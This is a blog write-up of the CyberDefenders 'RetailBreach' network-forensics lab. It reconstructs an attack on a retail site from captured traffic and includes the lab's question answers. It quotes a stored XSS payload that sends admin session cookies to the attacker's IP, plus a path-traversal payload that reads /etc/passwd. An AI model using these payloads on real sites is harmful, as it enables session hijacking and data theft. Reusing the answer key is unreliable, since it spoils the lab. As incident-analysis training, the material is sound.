// CyberDefenders  ·  Network Forensics

RetailBreach

CyberDefenders Easy Wireshark
[Reconnaissance, Initial Access, Execution, Defense Evasion, Credential Access, Discovery, Lateral Movement]
proof of completion → challenge page → ← all labs

Scenario

ShopSphere, a prominent online retail platform, experienced unusual administrative login activity during late-night hours coinciding with customer complaints about unexplained account anomalies. Network traffic was captured to identify the source and method of the breach.

Tooling

Investigation

Identifying the Attacker

retail_conversion.png Filtering traffic to isolate attacker activity:

http && ip.addr == 111.224.180.128

This revealed the attacker IP 111.224.180.128 conducting a range of malicious activity across the capture.

Directory Brute-Forcing

Analysis of attacker traffic showed a high volume of GET requests to non-existent paths — consistent with directory enumeration. The User-Agent string identified the tool as Gobuster, a common directory brute-forcing utility used to discover hidden endpoints. retail_gobuster.png

XSS — Session Cookie Theft

The attacker injected a malicious script into the reviews endpoint to steal admin session cookies:

<script>fetch('http://111.224.180.128/' + document.cookie);</script>

Filtering for GET requests to identify the victim accessing the poisoned page:

http.request.method == "GET"

Examining traffic to reviews.php revealed the victim IP 135.143.142.5 visiting the page containing the injected script at 2024-03-29 12:09 UTC, triggering the cookie exfiltration. `` retail_cookies.png

The stolen session cookie was:

lqkctf24s9h9lg67teu8uevn3q

retail_reviews.png

Session Hijacking & LFI

With the stolen cookie, the attacker authenticated as the admin and pivoted to the /admin/log_viewer.php endpoint. Using a path traversal payload, the attacker accessed the server’s /etc/passwd file:

../../../../../etc/passwd

Confirming the session cookie was used in attacker traffic:

http && ip.addr == 111.224.180.128 and frame contains "lqkctf24s9h9lg67teu8uevn3q"

![[retail_LFI.png]]

IOCs

| Type | Value | | —————- | —————————————————————— | | Stolen Cookie | lqkctf24s9h9lg67teu8uevn3q | | LFI Payload | ../../../../../etc/passwd | | IP | 111.224.180.128 | | XSS | script>fetch(‘http://111.224.180.128/’ + document.cookie);</script | | Exploited Script | log_viewer.php | | Timestamp | 2024-03-29 12:09 UTC | | Victim IP | 135.143.142.5 | | Tool | Gobuster |

Conclusion

The attacker enumerated hidden directories using Gobuster, injected a stored XSS payload into the reviews page to steal an admin session cookie, used the hijacked session to access the admin panel, and exploited a path traversal vulnerability in log_viewer.php to read /etc/passwd — demonstrating a full web attack chain from recon through to sensitive file disclosure.

References

Identifying an attacker's IP address is crucial for mapping the attack's extent and planning an effective response. What is the attacker's IP address?
Click flag to reveal 111.224.180.128
The attacker used a directory brute-forcing tool to discover hidden paths. Which tool did the attacker use to perform the brute-forcing?
Click to reveal answer gobuster
Cross-Site Scripting (XSS) allows attackers to inject malicious scripts into web pages viewed by users. Can you specify the XSS payload that the attacker used to compromise the integrity of the web application?
Click flag to reveal
Pinpointing the exact moment an admin user encounters the injected malicious script is crucial for understanding the timeline of a security breach. Can you provide the UTC timestamp when the admin user first visited the page containing the injected malicious script?
Click to reveal answer 2024-03-29 12:09
The theft of a session token through XSS is a serious security breach that allows unauthorized access. Can you provide the session token that the attacker acquired and used for this unauthorized access?
Click flag to reveal
Identifying which scripts have been exploited is crucial for mitigating vulnerabilities in a web application. What is the name of the script that was exploited by the attacker?
Click to reveal answer log_viewer.php
Exploiting vulnerabilities to access sensitive system files is a common tactic used by attackers. Can you identify the specific payload the attacker used to access a sensitive system file?
Click flag to reveal ../../../../../etc/passwd

I successfully completed RetailBreach Blue Team Lab at @CyberDefenders! https://cyberdefenders.org/blueteam-ctf-challenges/achievements/inksec/retailbreach/

#CyberDefenders #CyberSecurity #BlueYard #BlueTeam #InfoSec #SOC #SOCAnalyst #DFIR #CCD #CyberDefender

← blue team ops inksec.io red team →